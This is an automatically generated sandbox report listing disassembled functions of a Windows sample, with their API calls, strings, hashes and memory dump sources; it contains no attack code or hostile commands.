                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ConditionMask$Cmm@@CommandCreateH_prolog3_InfoInitializeInstanceLibraryLineLoadState@Unlock@VerifyVersion
                • String ID: mmdevapi.dll$runaszvideo
                • API String ID: 3291905021-606725207
                • Opcode ID: 696b48a8574bd8b647b01f54f01e86d9a8707103579e74f23cc52a4b5842ac3c
                • Instruction ID: 682e424a174569abc0e7dfdac624f04a480d78413ea17125054c56754b6100ef
                • Opcode Fuzzy Hash: 696b48a8574bd8b647b01f54f01e86d9a8707103579e74f23cc52a4b5842ac3c
                • Instruction Fuzzy Hash: 97214DB4A00209AFDB04DFA5DC85AEDB775AF08344B545019F925F73A2CB309D4AEB24
                Function 00CC6EC0 Relevance: 12.4, Strings: 9, Instructions: 1145COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Concurrency::cancel_current_task
                • String ID: $$'$/$/$Duplicate key: '$aration$in Json::Value::operator[](int index): index cannot be negative$keylength >= 2^30$name
                • API String ID: 118556049-37859427
                • Opcode ID: df4748f571e0f76120e6bdd89237f8e296f39b4da9e247f6266d89e344a76f1b
                • Instruction ID: 22768eab8e16443020cd86cacb45d395c80a63e09bf20e4117752522c3e47c41
                • Opcode Fuzzy Hash: df4748f571e0f76120e6bdd89237f8e296f39b4da9e247f6266d89e344a76f1b
                • Instruction Fuzzy Hash: 2EA2F270A04248DFDB25CFA8C845FADBBB5EF55300F18825DE855AB382DB74AA45CF90
                Function 00C5CC8F Relevance: 12.1, APIs: 8, Instructions: 104threadtimeCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5CC96
                • ?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPB_WI@Z.RWSNDPQSKZ(?,00000000,?,000000FF), ref: 00C5CCFD
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(?,00C5CDE3), ref: 00C5CD14
                • ??0CIPCChannelThread@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@Channel@1@H@Z.RWSNDPQSKZ ref: 00C5CD30
                • ?Start@CIPCChannelThread@ssb_ipc@@QAEHXZ.RWSNDPQSKZ ref: 00C5CD60
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00C5CD77
                • ?Now@Time@Cmm@@SA?AV12@XZ.RWSNDPQSKZ(?), ref: 00C5CD95
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00C5CDBA
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Channel$State@StringThread@ssb_ipc@@Unlock@$??0?$?_cstring_set@Channel@1@D@1@D@2@@std@@D@std@@H_prolog3_Listener@Mode@1@Now@Start@Time@U?$char_traits@V12@V?$allocator@V?$basic_string@
                • String ID:
                • API String ID: 3385893932-0
                • Opcode ID: e37b5f03c730e844f26042a187450015d6a958149c2906fb359d4f6facff991b
                • Instruction ID: a46227144a252f352ca813ea14367792e42d79da61666b93a6dca09557524dde
                • Opcode Fuzzy Hash: e37b5f03c730e844f26042a187450015d6a958149c2906fb359d4f6facff991b
                • Instruction Fuzzy Hash: B641B375900304CFDF04DF98C4856ACBFB1EF44325F548159E815AB391CB749A8ACF65
                Function 00CAC40B Relevance: 12.1, APIs: 8, Instructions: 96windowfilepipeCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAC412
                  • Part of subcall function 00CAC2FE: __EH_prolog3_GS.LIBCMT ref: 00CAC308
                  • Part of subcall function 00CAC2FE: ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(?,?,000000BC), ref: 00CAC349
                  • Part of subcall function 00CAC2FE: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00CAC3AA
                • CreateNamedPipeW.KERNEL32(?,40080003,00000000,00000001,00001000,00001000,00001388,0000000C), ref: 00CAC485
                • LocalFree.KERNEL32(?), ref: 00CAC491
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,40110000,00000000,?,?,00000068,00CAC0E6,?), ref: 00CAC4B6
                • ??0SBIPCMessage_Connect@@QAE@XZ.RWSNDPQSKZ ref: 00CAC4D1
                • GetCurrentProcessId.KERNEL32 ref: 00CAC4DA
                • ?SetMsgType@CmmInternelMsg@Cmm@@QAEXH@Z.RWSNDPQSKZ(?), ref: 00CAC50E
                • ??1?$CmmMessageTemplate_1@I@Archive@Cmm@@UAE@XZ.RWSNDPQSKZ(?), ref: 00CAC522
                  • Part of subcall function 00CABED2: __EH_prolog3_GS.LIBCMT ref: 00CABEDC
                  • Part of subcall function 00CABED2: GetCurrentProcess.KERNEL32(00000008,?,000000C8,00CAC44F), ref: 00CABEF4
                  • Part of subcall function 00CABED2: OpenProcessToken.ADVAPI32(00000000), ref: 00CABEFB
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@H_prolog3_Process$CreateCurrent$??1?$Archive@AssignConnect@@D@2@@std@@@D@std@@FileFreeInternelIos_base_dtorLocalMessageMessage_Msg@NamedOpenOther@?$PipeStringTemplate_1@TokenType@U?$char_traits@V12@V?$allocator@V?$basic_string@std::ios_base::_
                • String ID:
                • API String ID: 4240486610-0
                • Opcode ID: 48be006dc01c56e73befe7b8e452413a1c1d8be494689c5ab886b64317d66e36
                • Instruction ID: d83b0aaa4d2038bb6b70285c08f18411f9c36dc4618d76f0c8016be6614d920b
                • Opcode Fuzzy Hash: 48be006dc01c56e73befe7b8e452413a1c1d8be494689c5ab886b64317d66e36
                • Instruction Fuzzy Hash: E8316CB0D00309EEDB10EFA4CC95AEEBBB8AF19314F504529F425A7291DB70AA45DB24
                Function 00D0A5D6 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: 7e75df8c0d3a879dcf9e5c21690d3e50f609d39f90d78732af125054fe155b48
                • Instruction ID: 01824ab35e723c9b92d1f2533d51d257871a7d3bd75658ccf20ba640f3da6f93
                • Opcode Fuzzy Hash: 7e75df8c0d3a879dcf9e5c21690d3e50f609d39f90d78732af125054fe155b48
                • Instruction Fuzzy Hash: 98C26F71E086288FDB25CF28DD407EAB7B5EB48315F1841EAD84DE7280E775AE818F51
                Function 00D0E5D7 Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON
                Download Yara Rule
                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000C,00D0E4F3,00000000,?,00D0E68B,00000000), ref: 00D0E5D9
                • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000), ref: 00D0E600
                • HeapAlloc.KERNEL32(00000000), ref: 00D0E607
                • InitializeSListHead.KERNEL32(00000000), ref: 00D0E614
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D0E629
                • HeapFree.KERNEL32(00000000), ref: 00D0E630
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                • String ID:
                • API String ID: 1475849761-0
                • Opcode ID: 716f91f16fc37a328361c481a8eba463c19df3cf02dee33d32ce8487aaf94a0c
                • Instruction ID: 2f619c588cee02668445d2a6cbca442d9ce572f4591225c163a62ba77510f983
                • Opcode Fuzzy Hash: 716f91f16fc37a328361c481a8eba463c19df3cf02dee33d32ce8487aaf94a0c
                • Instruction Fuzzy Hash: 31F03171640311ABD7209F79AC08B5677AABB98B52F084829F945D3390DF308802C671
                Function 00CAE7E0 Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00C57B52: __EH_prolog3.LIBCMT ref: 00C57B59
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,9FB8111D), ref: 00CAE849
                • OutputDebugStringA.KERNEL32(?,?,9FB8111D), ref: 00CAE880
                  • Part of subcall function 00CAE0AD: __EH_prolog3_GS.LIBCMT ref: 00CAE0B7
                  • Part of subcall function 00CAE0AD: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000294,00CAE9BE,?,?), ref: 00CAE0E4
                  • Part of subcall function 00CAE0AD: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00CAE1C1
                  • Part of subcall function 00CAE0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CAE1D3
                  • Part of subcall function 00CAE0AD: CloseHandle.KERNEL32(?), ref: 00CAE1DF
                  • Part of subcall function 00CAE0AD: CloseHandle.KERNEL32(?), ref: 00CAE1EB
                  • Part of subcall function 00C58567: _Deallocate.LIBCONCRT ref: 00C58576
                • ?BaseInitLoggingImpl_built_with_NDEBUG@logging@@YA_NPB_WW4LoggingDestination@1@W4LogLockingState@1@W4OldFileDeletionState@1@W4LogEncryptPolicy@1@K@Z.RWSNDPQSKZ(?,00000000,00000000,?,?), ref: 00CAE91D
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?), ref: 00CAE99F
                • SetLastError.KERNEL32(?,?), ref: 00CAE9D4
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CloseCmm@@FileHandleLoggingState@State@1@Unlock@$BaseCreateDeallocateDebugDeletionDestination@1@EncryptErrorG@logging@@H_prolog3H_prolog3_Impl_built_with_InitLastLockingModuleNameObjectOutputPolicy@1@ProcessSingleStringWait
                • String ID:
                • API String ID: 3033691180-0
                • Opcode ID: 10f9560c4b84dd5bb5f9d70e48d7faf32f3cffced70cd0aa07e0aac9fa9777d9
                • Instruction ID: 5bb6c4406f6ffd56742b5e1e0d45a76ea8bdb36c011462fdf977d6e8cc22c326
                • Opcode Fuzzy Hash: 10f9560c4b84dd5bb5f9d70e48d7faf32f3cffced70cd0aa07e0aac9fa9777d9
                • Instruction Fuzzy Hash: C8519331A0021ADFCF14EFA4DC45AEEB7B9FF05714F444129E916E3251DB34AA49DBA0
                Function 00CE2106 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CE2110
                • GetPrivateProfileStringW.KERNEL32(Settings,CrashRptVersion,00D34CD0,?,00000400), ref: 00CE2161
                  • Part of subcall function 00CDCC2E: __EH_prolog3.LIBCMT ref: 00CDCC35
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3H_prolog3_PrivateProfileString
                • String ID: CrashRptVersion$Settings
                • API String ID: 3381506161-2410450273
                • Opcode ID: 421a8f933cc94904a6c39edd70b44d39c26171df7528cba8a20f1e193becb2fd
                • Instruction ID: 524ba1a1c82291299f77565fa4a382747be6655d1823e3f3f40a331c84345c5b
                • Opcode Fuzzy Hash: 421a8f933cc94904a6c39edd70b44d39c26171df7528cba8a20f1e193becb2fd
                • Instruction Fuzzy Hash: F9F062B094035C6EDB10AF569D45ADEB6FDBF84300F44C4ADB148A7240DEB04A869FE0
                Function 00C647F0 Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                Download Yara Rule
                APIs
                • ?cmm_memset_s@Cmm@@YAHPAXIHI@Z.RWSNDPQSKZ(00000000,?,00000000,?), ref: 00C663C9
                • ?rbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ.RWSNDPQSKZ(00000008), ref: 00C663E7
                • ?rbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ.RWSNDPQSKZ(00000008), ref: 00C6647C
                • ?rbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ.RWSNDPQSKZ(00000008), ref: 00C6649D
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: V?$_$Cmm@@$?rbegin@?$Simple_types@_StringString_const_iterator@String_val@U?$_V?$reverse_iterator@W@std@@@std@@@std@@@std@@$?cmm_memset_s@
                • String ID:
                • API String ID: 3748862334-0
                • Opcode ID: cd934b48ad3356f0af8cac3307eab27265feb79a558b2c7c8a6232557efbb07c
                • Instruction ID: b8e5826b4fb3d68157e0891f7fde8d1b54b68cd2d5e3fa32825b599d9a491c86
                • Opcode Fuzzy Hash: cd934b48ad3356f0af8cac3307eab27265feb79a558b2c7c8a6232557efbb07c
                • Instruction Fuzzy Hash: A351E231A00109DFCB35DF69C9D09BEB7B5EB81744BA085A9D452AB240DB30EE93DBD0
                Function 00CDEC9F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                Download Yara Rule
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(00CE0360,?,?,?,?,00CDE560,?,00000000,00000000,?,dbghelp.dll,00000000,00000000,00000000,00000000,00000000), ref: 00CDECBD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID: Success.$Unspecified error.:%x
                • API String ID: 3192549508-2677431836
                • Opcode ID: 35315d922e8f918d0e29d488565a389706568855912ac08fe718b45b7c06ca22
                • Instruction ID: bc2bbdb1da5975d473669e7139b7dcf06e70e632c4f916206a16392eea0c1e02
                • Opcode Fuzzy Hash: 35315d922e8f918d0e29d488565a389706568855912ac08fe718b45b7c06ca22
                • Instruction Fuzzy Hash: 4F11EB716847066EE3247FA99847B6673D09F00710F14442FFB99592D3EFE1548095B5
                Function 00CE466A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00C521B2: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,00C5100A), ref: 00C521B8
                  • Part of subcall function 00C521B2: GetLastError.KERNEL32(?,00000000,00000000,?,00C5100A), ref: 00C521C2
                • IsDebuggerPresent.KERNEL32(?,?,?,00C5158A), ref: 00CE469D
                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C5158A), ref: 00CE46AC
                Strings
                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00CE46A7
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                • API String ID: 3511171328-631824599
                • Opcode ID: 4e9af43a411315fe68a03e03406ab6756817b170861ca80c3f958b623f9ae8a8
                • Instruction ID: 55185a093a9e5f23f47fbb5c5816155f95ee477f86503beacacea1a6efb78b41
                • Opcode Fuzzy Hash: 4e9af43a411315fe68a03e03406ab6756817b170861ca80c3f958b623f9ae8a8
                • Instruction Fuzzy Hash: 0FE06D742007908FC320AF69E4187477AE4AF15745F00C82DF8A2C6350DBB4D88C8BB5
                Function 00CCE8D0 Relevance: 5.0, APIs: 1, Strings: 1, Instructions: 1450COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00C5A986: __EH_prolog3.LIBCMT ref: 00C5A98D
                  • Part of subcall function 00C5A986: std::_Lockit::_Lockit.LIBCPMT ref: 00C5A997
                  • Part of subcall function 00C5A986: int.LIBCPMT ref: 00C5A9AE
                  • Part of subcall function 00C5A986: std::_Lockit::~_Lockit.LIBCPMT ref: 00C5AA08
                • Concurrency::cancel_current_task.LIBCPMT ref: 00CCF88F
                Strings
                • 0123456789ABCDEFabcdef-+XxPp, xrefs: 00CCE9CF
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                • String ID: 0123456789ABCDEFabcdef-+XxPp
                • API String ID: 4244582100-3606100449
                • Opcode ID: 2bdcd8f997bbc4f1e4b97d64cabdc4749f76e802537d8934886502b168281416
                • Instruction ID: 11178a090e41b9d9060235ab0fccab76f3e7889e169d1d4fb1731bdd67a6e422
                • Opcode Fuzzy Hash: 2bdcd8f997bbc4f1e4b97d64cabdc4749f76e802537d8934886502b168281416
                • Instruction Fuzzy Hash: A6C29074604244CFDB25CF29C490FA9BBF2AF56314F2885ADD8A58B292D331ED87DB50
                Function 00CFE1C4 Relevance: 4.7, APIs: 3, Instructions: 171timeCOMMON
                Download Yara Rule
                APIs
                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00D265C0), ref: 00CFE22E
                • _free.LIBCMT ref: 00CFE21C
                  • Part of subcall function 00CFE54D: HeapFree.KERNEL32(00000000,00000000,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?), ref: 00CFE563
                  • Part of subcall function 00CFE54D: GetLastError.KERNEL32(?,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?,?), ref: 00CFE575
                • _free.LIBCMT ref: 00CFE3E8
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
